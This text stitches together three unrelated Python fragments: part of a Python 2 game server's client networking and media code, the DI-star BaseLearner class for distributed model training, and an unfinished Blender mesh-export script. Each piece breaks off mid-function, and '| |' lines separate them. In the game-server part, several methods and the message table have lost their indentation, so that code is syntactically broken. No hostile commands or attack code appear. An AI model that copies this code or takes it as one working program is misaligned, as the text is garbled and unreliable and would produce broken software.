        """Try to push (part of) 'buffer' on the TCP socket.

        At most SEND_BOUND_PER_FRAME bytes are sent per call; whatever
        remains is re-queued, either as the pending initial data or as the
        single remaining entry of self.msgl. On EWOULDBLOCK the whole buffer
        is simply re-queued; on any other socket error the client is
        disconnected.
        """
        try:
            count = self.socket.send(buffer[:self.SEND_BOUND_PER_FRAME])
        except error, e:
            if e.args[0] != EWOULDBLOCK:
                # real socket error: drop all pending data and disconnect
                self.msgl = []
                self.initialdata = ""
                self.disconnect(e, 'emit')
                return
        else:
            #g = open('log', 'ab'); g.write(buffer[:count]); g.close()
            buffer = buffer[count:]
            self.activity = NOW
        if self.initialdata:
            self.initialdata = buffer
        elif buffer:
            self.msgl = [buffer]
        else:
            self.msgl = []
    def receive(self, data):
        """Accumulate raw TCP data and dispatch complete messages.

        Partial messages are kept in self.buf until more data arrives. A
        struct.error while decoding means the peer does not speak our
        protocol (e.g. a web browser hit the game port): answer with a small
        HTML hint and disconnect.
        """
        #print "receive:", `data`
        try:
            data = self.buf + data
            while data:
                values, data = decodemessage(data)
                if not values:
                    break   # incomplete message
                fn = self.MESSAGES.get(values[0])
                if fn:
                    fn(self, *values[1:])
                else:
                    print "unknown message from", self.addr, ":", values
            self.buf = data
        except struct.error:
            import traceback
            traceback.print_exc()
            self.socket.send('\n\n<h1>Protocol Error</h1>\n')
            # if an HTTP server socket is running, point the user at it
            hs = findsocket('HTTP')
            if hs is not None:
                url = 'http://%s:%s' % (HOSTNAME, displaysockport(hs))
                self.socket.send('''
                    If you meant to point your web browser to this server,
                    then use the following address:
                    <a href="%s">%s</a>
                ''' % (url, url))
            self.disconnect('protocol error', 'receive')
    def input_handler(self):
        """select() callback: read pending TCP data and dispatch it.

        An empty recv() normally means the peer closed the connection; for
        socket-like objects flagged RECV_CAN_RETURN_EMPTY that is not
        conclusive, so a zero-timeout select() double-checks.
        """
        try:
            data = self.socket.recv(2048)
        except error, e:
            self.disconnect(e, "socket.recv")
        else:
            if data:
                self.activity = NOW
                self.receive(data)
            elif not hasattr(self.socket, 'RECV_CAN_RETURN_EMPTY'):
                # safecheck that this means disconnected
                iwtd, owtd, ewtd = select([self.socket], [], [], 0.0)
                if self.socket in iwtd:
                    self.disconnect('end of data', 'socket.recv')
    def disconnect(self, err=None, infn=None):
        """Tear this client down: unregister it, release its players and
        close its socket.

        :param err: optional error that caused the disconnection.
        :param infn: optional name of the operation during which it happened.
        """
        removesocket('CLIENT', self.socket)
        if err:
            extra = ": " + str(err)
        else:
            extra = ""
        if infn:
            extra += " in " + infn
        print 'Disconnected by', self.addr, extra
        self.log('disconnected' + extra)
        for p in self.players.values():
            p._playerleaves()
        try:
            del broadcast_clients[self]
        except KeyError:
            pass
        clients.remove(self)
        try:
            self.socket.close()
        except:
            pass
        self.socket = None
        # notify the game when the last client has gone
        if not clients and game is not None:
            game.FnDisconnected()
    def killplayer(self, player):
        """Remove 'player' from this client, broadcasting MSG_PLAYER_KILL.

        :param player: the player instance to remove.
        """
        # NOTE: under Python 2 items() returns a list, so deleting from
        # self.players while iterating is safe here
        for id, p in self.players.items():
            if p is player:
                framemsgappend(message(MSG_PLAYER_KILL, id))
                del self.players[id]
        if game:
            game.updateplayers()
    def joinplayer(self, id, *rest):
        """Let this client take control of player slot 'id'.

        Refused when the game has not started yet, the slot does not exist,
        or the slot is already played (by this or another client).
        """
        if self.players.has_key(id):
            print "Note: player %s is already playing" % (self.addr+(id,),)
            return
        if game is None:
            return # refusing new player before the game starts
        p = game.FnPlayers()[id]
        if p is None:
            print "Too many players. New player %s refused." % (self.addr+(id,),)
            self.msgl.append(message(MSG_PLAYER_KILL, id))
        elif p.isplaying():
            print "Note: player %s is already played by another client" % (self.addr+(id,),)
        else:
            print "New player %s" % (self.addr+(id,),)
            p._client = self
            p.playerjoin()
            p.setplayername('')
            self.players[id] = p
            game.updateplayers()
            # announce the join to every client; the flag tells each
            # receiver whether it owns the new player
            for c in clients:
                c.msgl.append(message(MSG_PLAYER_JOIN, id, c is self))
    def remove_player(self, id, *rest):
        """Release player slot 'id' if this client controls it."""
        try:
            p = self.players[id]
        except KeyError:
            print "Note: player %s is not playing" % (self.addr+(id,),)
        else:
            p._playerleaves()
def set_player_name(self, id, name, *rest):
p = game.FnPlayers()[id]
p.setplayername(name)
    def set_udp_port(self, port, addr=None, *rest):
        """Choose how frame data reaches this client.

        Three modes, selected by 'port':
          * MSG_BROADCAST_PORT: the client listens to LAN broadcasts;
          * MSG_INLINE_FRAME or 0: frames are tunnelled over the TCP stream;
          * any other value: a real UDP socket connected to (addr, port),
            with dynamic compression when the protocol version allows it.
        """
        if port == MSG_BROADCAST_PORT:
            self.log('set_udp_port: broadcast')
            broadcast_clients[self] = 1
            #print "++++ Broadcasting ++++ to", self.addr
        else:
            try:
                del broadcast_clients[self]
            except KeyError:
                pass
            if port == MSG_INLINE_FRAME or port == 0:
                # client requests data in-line on the TCP stream
                self.dyncompress = None
                import udpovertcp
                self.udpsocket = udpovertcp.SocketMarshaller(self.socket, self)
                s = self.udpsocket.tcpsock
                self.log('set_udp_port: udp-over-tcp')
            else:
                try:
                    if hasattr(self.socket, 'udp_over_udp_mixer'):
                        # for SocketOverUdp
                        self.udpsocket = self.socket.udp_over_udp_mixer()
                    else:
                        self.udpsocket = socket(AF_INET, SOCK_DGRAM)
                        self.udpsocket.setblocking(0)
                        addr = addr or self.addr[0]
                        self.udpsocket.connect((addr, port))
                except error, e:
                    print >> sys.stderr, "Cannot set UDP socket to", addr, str(e)
                    self.udpsocket = None
                    self.udpsockcounter = sys.maxint
                else:
                    if self.proto >= 3:
                        self.setup_dyncompress()
                    s = self.udpsocket
                    self.log('set_udp_port: %s:%d' % (addr, port))
            if s:
                try:
                    s.setsockopt(SOL_IP, IP_TOS, 0x10) # IPTOS_LOWDELAY
                except error, e:
                    print >> sys.stderr, "Cannot set IPTOS_LOWDELAY:", str(e)
def enable_sound(self, sound_mode=1, *rest):
if sound_mode != self.has_sound:
self.sounds = {}
self.has_sound = sound_mode
if self.has_sound > 0:
for snd in samples.values():
snd.defall(self)
#self.log('enable_sound %s' % sound_mode)
def enable_music(self, mode, *rest):
if mode != self.has_music:
self.has_music = mode
self.startmusic()
#self.log('enable_music')
    def startmusic(self):
        """(Re)start music streaming according to self.has_music.

        Makes sure the client has the definition of every current track,
        pushes an initial chunk of data when full streaming is enabled,
        then tells the client to start playing.
        """
        if self.has_music:
            self.musicstreamer = time()
            for cde in currentmusics[1:]:
                if cde not in self.musicpos:
                    # first time this track is sent to this client
                    msgl, self.musicpos[cde] = music_by_id[cde].initialsend(self)
                    self.msgl += msgl
            if self.has_music > 1:
                self.sendmusicdata()
            self.msgl.append(message(MSG_PLAY_MUSIC, *currentmusics))
    def sendmusicdata(self):
        """Stream the next chunk of every current music track.

        A stored position of None means the track has been fully sent.
        """
        for cde in currentmusics[1:]:
            if self.musicpos[cde] is not None:
                # clientsend returns (messages, new position or None at EOF)
                msgl, self.musicpos[cde] = music_by_id[cde].clientsend(self.musicpos[cde])
                self.msgl += msgl
        return
    def ping(self, *rest):
        """Answer a PING with a PONG, finishing initialization on first ping.

        The first ping triggers sending all bitmap data, the subclass
        finishinit() hook and the current player icons.
        """
        if self.initialized < 2:
            # send all current bitmap data
            self.initialized = 2
            for b in bitmaps.values():
                b.defall(self)
            self.finishinit(game)
            for id, p in game.FnPlayers().items():
                if p.standardplayericon is not None:
                    self.msgl.append(message(MSG_PLAYER_ICON, id, p.standardplayericon.code))
        self.msgl.append(message(MSG_PONG, *rest))
def finishinit(self, game):
pass
def pong(self, *rest):
pass
    def log(self, message):
        # simple stdout logging, prefixed with the client address
        print self.addr, message
def protocol_version(self, version, *rest):
self.proto = version
def md5_data_request(self, fileid, position, size, *rest):
data = filereaders[fileid]((position, size))
data = zlib.compress(data)
self.msgl.append(message(MSG_ZPATCH_FILE, fileid, position, data))
## def def_file(self, filename, md5sum):
## fnp = []
## while filename:
## filename, tail = os.path.split(filename)
## fnp.insert(0, tail)
## if fnp[:len(FnBasePath)] == FnBasePath:
## filename = os.path.join(*fnp[len(FnBasePath):])
## self.known_files[filename] = md5sum
MESSAGES = {
CMSG_PROTO_VERSION: protocol_version,
CMSG_ADD_PLAYER : joinplayer,
CMSG_REMOVE_PLAYER: remove_player,
CMSG_UDP_PORT : set_udp_port,
CMSG_ENABLE_SOUND : enable_sound,
CMSG_ENABLE_MUSIC : enable_music,
CMSG_PING : ping,
CMSG_PONG : pong,
CMSG_DATA_REQUEST : md5_data_request,
CMSG_PLAYER_NAME : set_player_name,
## CMSG_DEF_FILE : def_file,
}
class SimpleClient(Client):
    """Client subclass that maps numbered key events to game callbacks."""

    def finishinit(self, game):
        # advertise every game key binding (name, number, icons) to the client
        num = 0
        for keyname, icolist, fn in game.FnKeys:
            self.msgl.append(message(MSG_DEF_KEY, keyname, num,
                                     *[ico.code for ico in icolist]))
            num += 1

    def cmsg_key(self, pid, keynum):
        # dispatch a key press from player 'pid' to the bound game method;
        # unknown players or key numbers are reported via game.FnUnknown()
        if game is not None:
            try:
                player = self.players[pid]
                fn = game.FnKeys[keynum][2]
            except (KeyError, IndexError):
                game.FnUnknown()
            else:
                getattr(player, fn) ()

    # extend the base dispatch table with the key event message
    MESSAGES = Client.MESSAGES.copy()
    MESSAGES.update({
        CMSG_KEY: cmsg_key,
        })
MAX_CLIENTS = 32           # hard cap on simultaneous client connections
clients = []               # currently connected Client instances
FnClient = SimpleClient    # factory used to wrap accepted connections
broadcast_clients = {}     # clients receiving frames via UDP broadcast
filereaders = {}           # fileid -> callable((position, size)) -> data
bitmaps = {}               # filename -> Bitmap cache (see getbitmap)
samples = {}               # (filename, freqfactor) -> Sample cache (see getsample)
music_by_id = {}           # music fileid -> Music instance
currentmusics = [0]        # current play list: [n_intro, fileid, fileid, ...]
sprites = ['']             # packed sprite definition data
sprites_by_n = {}
recording = None           # optional frame recorder (see framemsgappend)
game = None                # active game instance; None before the game starts
serversockets = {}
socketsbyrole = {}
socketports = {}
def framemsgappend(msg):
    """Queue 'msg' for every connected client (and the recorder, if any)."""
    for client in clients:
        client.msgl.append(msg)
    if recording:
        recording.write(msg)
##def sndframemsgappend(msg):
## for c in clients:
## if c.has_sound:
## c.msgl.append(msg)
def set_udp_port(port):
    """Select the UDP port used by the host chooser."""
    hostchooser.UDP_PORT = port
def has_loop_music():
    """Return True if the current play list contains at least one loop track."""
    loop_from = currentmusics[0]
    return loop_from < len(currentmusics) - 1
def finalsegment(music1, music2):
    """Return True when the two play lists end identically.

    Each list has the form [n_intro, fileid, fileid, ...]: the first element
    gives the number of intro tracks, followed by the intro track ids, then
    the loop track ids. The lists match when their loop parts are equal and
    the first intro is a suffix of the second.
    """
    n1, n2 = music1[0], music2[0]
    intro1, loop1 = music1[1:1 + n1], music1[1 + n1:]
    intro2, loop2 = music2[1:1 + n2], music2[1 + n2:]
    if loop1 != loop2:
        return False
    return intro1 == intro2[len(intro2) - len(intro1):]
def set_musics(musics_intro, musics_loop, reset=1):
    """Install a new play list (intro tracks then loop tracks).

    The clients' music stream is restarted unless 'reset' is false and the
    new list ends the same way as the current one (so playback can continue
    seamlessly).
    """
    mlist = [len(musics_intro)]
    for m in musics_intro + musics_loop:
        mlist.append(m.fileid)
    if not reset:
        # only restart when the tail of the play list actually changes
        reset = not finalsegment(mlist, currentmusics)
    currentmusics[:] = mlist
    if reset:
        for c in clients:
            c.startmusic()
def fadeout(time=1.0):
    """Fade the music out over 'time' seconds on every music-enabled client
    and clear the current play list."""
    msg = message(MSG_FADEOUT, int(time*1000))
    for client in clients:
        if client.has_music > 1:
            client.msgl.append(msg)
    currentmusics[:] = [0]
def getbitmap(filename, colorkey=None):
    """Return the (cached) Bitmap for 'filename', creating it on first use.

    :param filename: path of the bitmap file.
    :param colorkey: optional transparent color, only used on creation.
    """
    try:
        return bitmaps[filename]
    except KeyError:
        # was a bare `except:` that hid real errors; first request:
        # register a new bitmap under the next free code
        bmp = Bitmap(len(bitmaps), filename, colorkey)
        bitmaps[filename] = bmp
        return bmp
def getsample(filename, freqfactor=1):
    """Return the (cached) Sample for 'filename', creating it on first use.

    :param filename: path of the sound file.
    :param freqfactor: playback frequency factor, part of the cache key.
    """
    try:
        return samples[filename, freqfactor]
    except KeyError:
        # was a bare `except:` that hid real errors
        snd = Sample(len(samples), filename, freqfactor)
        samples[filename, freqfactor] = snd
        return snd
def getmusic(filename, filerate=44100):
    """Return the (cached) Music for 'filename', creating it on first use.

    :param filename: path of the music file.
    :param filerate: sample rate of the file, only used on creation.
    """
    try:
        return samples[filename]
    except KeyError:
        # was a bare `except:` that hid real errors
        # NOTE(review): musics share the `samples` dict with sound samples,
        # keyed by bare filename while samples use (filename, freqfactor) —
        # presumably intentional, but worth confirming
        mus = Music(filename, filerate)
        samples[filename] = mus
        music_by_id[mus.fileid] = mus
        return mus
def newbitmap(data, | |
# ctools/worker/learner/base_learner.py (from XinyuJing/DI-star)
"""
Copyright 2020 <NAME>. All Rights Reserved
Main Function:
1. base class for model learning
"""
import os
from abc import ABC, abstractmethod
from typing import Any, Union, Callable
from functools import partial
from easydict import EasyDict
import torch
from ctools.data import default_collate
from ctools.data.new_dataloader import AsyncDataLoader
from ctools.torch_utils import build_checkpoint_helper, CountVar, auto_checkpoint, build_log_buffer, to_device
from ctools.utils import build_logger, dist_init, EasyTimer, dist_finalize, pretty_print, read_config, \
get_task_uid, import_module, broadcast
from ctools.utils import deep_merge_dicts
from .comm import LearnerCommHelper
from .learner_hook import build_learner_hook_by_cfg, add_learner_hook, merge_hooks, LearnerHook
default_config = read_config(os.path.join(os.path.dirname(__file__), "base_learner_default_config.yaml"))
class BaseLearner(ABC):
r"""
Overview:
base class for model learning(SL/RL), which is able to multi-GPU learning
Interface:
__init__, register_stats, run, close, call_hook, info, save_checkpoint, launch
Property:
last_iter, optimizer, lr_scheduler, computation_graph, agent, log_buffer, record,
load_path, save_path, checkpoint_manager, name, rank, tb_logger, use_distributed
"""
_name = "BaseLearner" # override this variable for sub-class learner
def __init__(self, cfg: EasyDict) -> None:
"""
Overview:
initialization method, load config setting and call ``_init`` for actual initialization,
set the communication mode to `single_machine` or `flask_fs`.
Arguments:
- cfg (:obj:`EasyDict`): learner config, you can view `cfg <../../../configuration/index.html>`_ for ref.
Notes:
if you want to debug in sync CUDA mode, please use the following line code in the beginning of ``__init__``.
.. code:: python
os.environ['CUDA_LAUNCH_BLOCKING'] = "1" # for debug async CUDA
"""
self._cfg = deep_merge_dicts(default_config, cfg)
self._init()
if self._cfg.learner.communication.type == 'single_machine':
self._logger.info("Single machine learner has launched")
else:
comm_cfg = self._cfg.learner.communication
LearnerCommHelper.enable_comm_helper(self, comm_cfg)
self._logger.info("Distributed learner has launched")
    def _init(self) -> None:
        """
        Overview:
            Use ``self._cfg`` setting to build common learner components:
            paths, distributed context, device, logger helper, log buffer,
            checkpoint helper and the (initially empty) hook registry.
        """
        self._learner_worker_uid = get_task_uid()
        self._load_path = self._cfg.common.load_path
        self._save_path = self._cfg.common.save_path
        self._use_cuda = self._cfg.learner.use_cuda
        self._use_distributed = self._cfg.learner.use_distributed
        self._learner_uid = self._cfg.learner.learner_uid
        if self._use_distributed:
            # multi-GPU: rank/world_size come from the distributed backend
            self._rank, self._world_size = dist_init()
        else:
            self._rank, self._world_size = 0, 1
        if self._use_cuda:
            self._device = torch.cuda.current_device()
        else:
            self._device = 'cpu'
        self._default_max_iterations = self._cfg.learner.max_iterations
        self._timer = EasyTimer()
        # logger
        self._logger, self._tb_logger, self._record = build_logger(self._cfg, rank=self._rank)
        self._log_buffer = build_log_buffer()
        # checkpoint helper
        self._checkpointer_manager = build_checkpoint_helper(self._cfg)
        # hook registry, populated later by _setup_hook()
        self._hooks = {'before_run': [], 'before_iter': [], 'after_iter': [], 'after_run': []}
        self._collate_fn = default_collate
    def launch(self) -> None:
        """
        Overview:
            Launch learner runtime components; each train job means one launch operation.
            Sets up the job-related dataloader, agent, optimizer, computation_graph,
            timing wrappers and hooks.
        """
        self._setup_dataloader()
        self._setup_agent()
        self._setup_optimizer()
        self._setup_computation_graph()
        self._last_iter = CountVar(init_val=0)
        # Only rank 0 registers stats, to avoid duplicated registration in distributed runs.
        if self._rank == 0:
            self.register_stats()
        self.info(
            pretty_print(
                {
                    "config": self._cfg,
                    "agent": repr(self._agent),
                    "computation_graph": repr(self._computation_graph)
                },
                direct_print=False
            )
        )
        # Wrappers must be installed before hooks so hooks see the timed versions.
        self._setup_wrapper()
        self._setup_hook()
def _setup_hook(self) -> None:
"""
Overview:
Setup hook for base_learner. Hook is the way to implement actual functions in base_learner.
You can reference learner_hook.py
"""
if hasattr(self, '_hooks'):
self._hooks = merge_hooks(self._hooks, build_learner_hook_by_cfg(self._cfg.learner.hook))
else:
self._hooks = build_learner_hook_by_cfg(self._cfg.learner.hook)
    def _setup_wrapper(self) -> None:
        """
        Overview:
            Wrap ``_get_iter_data`` and ``_train`` with timing so that 'data_time' and
            'train_time' are recorded in the log buffer on every iteration.
        """
        self._wrapper_timer = EasyTimer()
        self._get_iter_data = self.time_wrapper(self._get_iter_data, 'data_time')
        self._train = self.time_wrapper(self._train, 'train_time')
def time_wrapper(self, fn: Callable, name: str):
"""
Overview:
Wrap a function and measure the time it used
Arguments:
- fn (:obj:`Callable`): function to be time_wrapped
- name (:obj:`str`): name to be registered in log_buffer
"""
def wrapper(*args, **kwargs) -> Any:
with self._wrapper_timer:
ret = fn(*args, **kwargs)
self._log_buffer[name] = self._wrapper_timer.value
return ret
return wrapper
def _setup_dataloader(self) -> None:
"""
Overview:
Setup learner's dataloader, data_source need to be a generator,
and setup learner's collate_fn, which aggregate a listed data into a batch tensor.
"""
cfg = self._cfg.learner.data
# when single machine version, get_data is set by SingleMachineRunner
# when distributed version, get_data is set by comm LearnerCommHelper
# users don't need to know the related details if not necessary
#self._dataloader = AsyncDataLoader(
# self.get_data, cfg.batch_size, self._device, cfg.chunk_size, self._collate_fn, cfg.num_workers, max_reuse=cfg.max_reuse
#)
self._dataloader = AsyncDataLoader(
data_source=self.get_data,
batch_size=cfg.batch_size,
device=self._device,
learner_uid=self._learner_uid,
url_prefix='http://{}:{}/'.format(self._cfg.system.coordinator_ip, self._cfg.system.coordinator_port),
path_traj=self._cfg.common.path_traj,
collate_fn=self._collate_fn,
num_workers=cfg.num_workers,
use_async=cfg.get('use_async',True),
use_async_cuda=cfg.get('use_async_cuda',True),
max_reuse=cfg.max_reuse,
decompress_type=cfg.get('decompress_type','none')
)
    def _get_iter_data(self) -> Any:
        """Fetch the next batch from the dataloader (blocks until one is ready)."""
        return next(self._dataloader)
    @abstractmethod
    def _setup_agent(self) -> None:
        """
        Overview:
            Setup the learner's runtime agent; the agent is a subclass instance of `BaseAgent`.
            There may be more than one agent.
        Note:
            `agent` is the wrapped `model`; it can be wrapped with different plugins to satisfy
            different runtime usages (e.g. actor and learner would use the model differently).
        Raises:
            NotImplementedError: must be overridden by concrete learner subclasses.
        """
        raise NotImplementedError
    @abstractmethod
    def _setup_computation_graph(self) -> None:
        """
        Overview:
            Setup the computation_graph, which uses processed data and the agent to build
            an optimization computation graph.
        Raises:
            NotImplementedError: must be overridden by concrete learner subclasses.
        """
        raise NotImplementedError
def _setup_optimizer(self) -> None:
"""
Overview:
Setup learner's optimizer and lr_scheduler
"""
self._optimizer = torch.optim.Adam(
self._agent.model.parameters(),
lr=self._cfg.learner.learning_rate,
weight_decay=self._cfg.learner.weight_decay
)
self._lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self._optimizer, milestones=[], gamma=1)
    def _train(self, data: Any) -> None:
        """
        Overview:
            Train on the input data for 1 iteration, called in ``run``. Involves:
                - forward
                - backward
                - sync grad (if in distributed mode)
                - parameter update
        Arguments:
            - data (:obj:`Any`): data used for training
        """
        with self._timer:
            log_vars = self._computation_graph.forward(data, self._agent)
            loss = log_vars['total_loss']
        self._log_buffer['forward_time'] = self._timer.value
        with self._timer:
            self._optimizer.zero_grad()
            loss.backward()
            # Average gradients across processes before the parameter update.
            if self._use_distributed:
                self._agent.model.sync_gradients()
            self._optimizer.step()
            # NOTE(review): get_grad is not a standard torch.optim API — presumably the
            # optimizer is a project wrapper reporting a gradient statistic; confirm.
            grad = self._optimizer.get_grad()
        self._log_buffer['backward_time'] = self._timer.value
        self._log_buffer['grad'] = grad
        self._log_buffer.update(log_vars)
def register_stats(self) -> None:
"""
Overview:
register some basic attributes to record & tb_logger(e.g.: cur_lr, data_time, train_time),
register the attributes related to computation_graph to record & tb_logger.
"""
self._record.register_var('cur_lr')
self._record.register_var('data_time')
self._record.register_var('train_time')
self._record.register_var('forward_time')
self._record.register_var('backward_time')
self._tb_logger.register_var('cur_lr')
self._tb_logger.register_var('data_time')
self._tb_logger.register_var('train_time')
self._tb_logger.register_var('forward_time')
self._tb_logger.register_var('backward_time')
self._computation_graph.register_stats(self._record, self._tb_logger)
    def register_hook(self, hook: LearnerHook) -> None:
        """
        Overview:
            Add a new hook to the learner; it will be called at the position the hook declares.
        Arguments:
            - hook (:obj:`LearnerHook`): the hook to be added to learner
        """
        add_learner_hook(self._hooks, hook)
    @auto_checkpoint
    def run(self, max_iterations: Union[int, None] = None) -> None:
        """
        Overview:
            Run the learner training loop.
            For each iteration, the learner fetches training data and trains on it.
            Hooks are called at four fixed positions (before_run, before_iter, after_iter, after_run).
        Arguments:
            - max_iterations (:obj:`int`): the max run iteration; if None, uses default_max_iterations
        """
        if max_iterations is None:
            max_iterations = self._default_max_iterations
        # before run hook
        self.call_hook('before_run')
        for _ in range(max_iterations):
            # Fetch data first; _get_iter_data is time-wrapped, so data latency is logged.
            data = self._get_iter_data()
            # before iter hook
            self.call_hook('before_iter')
            self._train(data)
            # after iter hook
            self.call_hook('after_iter')
            self._last_iter.add(1)
        # after run hook
        self.call_hook('after_run')
def close(self) -> None:
"""
Overview:
Close the related resources, such as dist_finalize when use_distributed
"""
if self._use_distributed:
dist_finalize()
def call_hook(self, name: str) -> None:
"""
Overview:
Call the corresponding hook plugins according to name
Arguments:
- name (:obj:`str`): hooks in which position to call, \
should be in ['before_run', 'after_run', 'before_iter', 'after_iter']
"""
for hook in self._hooks[name]:
hook(self)
    def info(self, s: str) -> None:
        """
        Overview:
            Log a string message at INFO level via ``self._logger``.
        Arguments:
            - s (:obj:`str`): the message to add to the logger
        """
        self._logger.info(s)
def save_checkpoint(self) -> None:
"""
Overview:
Automatically save checkpoints.
Directly call ``save_ckpt_after_run`` hook instead of calling ``call_hook`` function.
Note:
This method is called by `auto_checkpoint` function in `checkpoint_helper.py`,
designed for saving checkpoint whenever an exception raises.
"""
names = [h.name for h in self._hooks['after_run']]
assert 'save_ckpt_after_run' in names
idx = names.index('save_ckpt_after_run')
self._hooks['after_run'][idx](self)
    # --- accessors for learner internals ---
    @property
    def last_iter(self) -> CountVar:
        # Counter of completed training iterations.
        return self._last_iter
    @property
    def optimizer(self) -> torch.optim.Optimizer:
        return self._optimizer
    @property
    def lr_scheduler(self) -> torch.optim.lr_scheduler._LRScheduler:
        return self._lr_scheduler
    @property
    def computation_graph(self) -> Any:
        return self._computation_graph
    @property
    def agent(self) -> 'BaseAgent':  # noqa
        return self._agent
    @property
    def log_buffer(self) -> dict:  # LogDict
        return self._log_buffer
    @log_buffer.setter
    def log_buffer(self, _log_buffer: dict) -> None:
        # Writable so external components (e.g. comm helpers) can swap the buffer.
        self._log_buffer = _log_buffer
    @property
    def record(self) -> 'VariableRecord':  # noqa
        return self._record
    @property
    def load_path(self) -> str:
        return self._load_path
    @load_path.setter
    def load_path(self, _load_path: str) -> None:
        self._load_path = _load_path
    @property
    def save_path(self) -> str:
        return self._save_path
    @property
    def checkpoint_manager(self) -> Any:
        return self._checkpointer_manager
    @property
    def name(self) -> str:
        # Class-level _name plus the instance id, giving a unique-per-process name.
        return self._name + str(id(self))
    @property
    def rank(self) -> int:
        return self._rank
    @property
    def tb_logger(self) -> 'TensorBoardLogger':  # noqa
        return self._tb_logger
    @property
    def use_distributed(self) -> bool:
        return self._use_distributed
# Global registry mapping learner name -> learner class (filled via register_learner).
learner_mapping = {}
def register_learner(name: str, learner: type) -> None:
    """
    Overview:
        Add a new Learner class with its name to the global ``learner_mapping`` dict.
        Any subclass derived from BaseLearner must use this function to register in the
        ctools system before being instantiated.
    Arguments:
        - name (:obj:`str`): name of the new Learner
        - learner (:obj:`type`): the new Learner class, should be subclass of BaseLearner
    """
    assert isinstance(name, str)
    assert issubclass(learner, BaseLearner)
    learner_mapping[name] = learner
def create_learner(cfg: EasyDict) -> BaseLearner:
"""
Overview:
Given the key(learner_type/name), create a new learner instance if in learner_mapping's values,
or raise an KeyError. In other words, a derived learner must first register then | |
"""
TODO:
Vertex Color
Tangent Space
V Flip
Normalize Bone Weights
Specify Axis Change
"""
import struct
from enum import Enum, IntFlag

import bpy
class VertexAttributeUsage(Enum):
    # Semantic of a vertex element; the integer value is packed into the binary
    # header's low nibble (see writeMesh: (index << 4) | usage.value).
    POSITION = 0
    TEXTURE_COORDINATE = 1
    NORMAL = 2
    COLOR = 3
    BINORMAL = 4
    TANGENT = 5
    BONE_WEIGHTS = 6
    BONE_INDICES = 7
    CUSTOM = 8
class VertexElementFlags(IntFlag):
    """Bit flags describing how a vertex element's components are interpreted.

    Declared as IntFlag (values are powers of two) so flags can be combined with
    ``|`` (e.g. UNSIGNED | NORMALIZED) while staying backward compatible with
    single-flag usage and ``.value`` access.
    """
    NONE = 0x00
    FLOAT = 0x01
    UNSIGNED = 0x02
    NORMALIZED = 0x04
class VertexElement:
    """Description of a single attribute within an interleaved vertex layout."""
    def __init__(self,
                 componentSize = 4, componentCount = 3,
                 usage = VertexAttributeUsage.POSITION, index = 0,
                 flags = VertexElementFlags.FLOAT, offset = 0):
        """Store the layout data for one vertex attribute.

        componentSize: size of one component in bytes.
        componentCount: number of components (e.g. 3 for an xyz position).
        usage: VertexAttributeUsage semantic of the element.
        index: usage index (e.g. which UV set this element belongs to).
        flags: VertexElementFlags describing component interpretation.
        offset: byte offset within the interleaved vertex struct.
        """
        self.componentSize = componentSize
        self.componentCount = componentCount
        self.usage = usage
        self.index = index
        self.flags = flags
        self.offset = offset
class MeshExportSettings:
    """Toggle set controlling which vertex attributes are exported and in what format."""
    def __init__(self):
        # Every optional attribute defaults to off; binary output is the default format.
        for flag in ('exportNormals', 'exportTextures', 'exportTangentSpace',
                     'exportVFlipped', 'exportBoneWeights'):
            setattr(self, flag, False)
        self.exportBinary = True
def getVertexElementsAndSize(mesh, settings):
    """Build the vertex element layout for `mesh` according to `settings`.

    Returns (elements, vertexSize): each element has its byte offset assigned and
    vertexSize is the total size of one interleaved vertex struct in bytes.
    """
    # Position is always exported.
    elements = [VertexElement(4, 3, VertexAttributeUsage.POSITION, 0, VertexElementFlags.FLOAT, 0)]
    if settings.exportNormals:
        elements.append(VertexElement(4, 3, VertexAttributeUsage.NORMAL, 0, VertexElementFlags.FLOAT, 0))
    if settings.exportTextures:
        # One 2D texture-coordinate element per UV layer, indexed by layer.
        for layerIndex, _ in enumerate(mesh.uv_layers):
            elements.append(VertexElement(4, 2, VertexAttributeUsage.TEXTURE_COORDINATE, layerIndex, VertexElementFlags.FLOAT, 0))
    if settings.exportTangentSpace and len(mesh.uv_layers) > 0:
        # Tangent space is exported only for the first texture layer.
        elements.append(VertexElement(4, 3, VertexAttributeUsage.TANGENT, 0, VertexElementFlags.FLOAT, 0))
        elements.append(VertexElement(4, 3, VertexAttributeUsage.BINORMAL, 0, VertexElementFlags.FLOAT, 0))
    if settings.exportBoneWeights:
        # Animation data: four float weights plus four uint16 bone indices.
        elements.append(VertexElement(4, 4, VertexAttributeUsage.BONE_WEIGHTS, 0, VertexElementFlags.FLOAT, 0))
        elements.append(VertexElement(2, 4, VertexAttributeUsage.BONE_INDICES, 0, VertexElementFlags.UNSIGNED, 0))
    # Lay out element offsets sequentially and accumulate the total struct size.
    runningOffset = 0
    for element in elements:
        element.offset = runningOffset
        runningOffset += element.componentSize * element.componentCount
    return (elements, runningOffset)
def getVertexIndex(map, elementInds):
    """Return the output index of the vertex described by `elementInds`, assigning
    the next sequential index if this attribute combination is new.

    Args:
        map: dict mapping vertex-key tuples to assigned indices (mutated in place).
        elementInds: list of per-element attribute indices identifying a unique vertex.
    """
    # setdefault evaluates len(map) before inserting, so a new key receives
    # exactly the next sequential index; existing keys return their old index.
    return map.setdefault(tuple(elementInds), len(map))
def getUnique(map, key):
    """Return the index assigned to `key`, allocating the next sequential index
    for keys not seen before (mutates `map` in place)."""
    # len(map) is evaluated before insertion, yielding the next sequential index.
    return map.setdefault(key, len(map))
def getTris(loops):
    """Triangulate a polygon's loop indices as a fan anchored at the first vertex.

    Yields one (anchor, prev, curr) tuple per triangle.
    """
    anchor = loops[0]
    prev = loops[1]
    for curr in loops[2:]:
        yield (anchor, prev, curr)
        prev = curr
def insertWeighting(l, w):
    """Insert the (boneIndex, weight) pair `w` into the weight list `l`, which is
    kept sorted by descending weight and capped at four entries.

    Returns the updated list, or `l` unchanged if `w` is not heavier than any entry.
    """
    updated = list(l)
    for pos in range(len(updated)):
        if w[1] > updated[pos][1]:
            updated.insert(pos, w)
            # Cap at the four heaviest influences.
            return updated[:4]
    return l
def getAllUniqueVertexIndices(context, mesh, ne, settings):
    """Deduplicate vertices across the mesh's triangles and gather export data.

    Args:
        context: Blender context (used for bone weights: context.object and the
            selected armature).
        mesh: Blender mesh datablock to process.
        ne: number of vertex elements (length of the per-vertex key).
        settings: MeshExportSettings selecting which attributes participate.

    Returns:
        (vl, uvl, animL, tris) where vl maps output vertex index -> key tuple,
        uvl maps uv-layer/uv index -> rounded UV pair, animL holds per-source-vertex
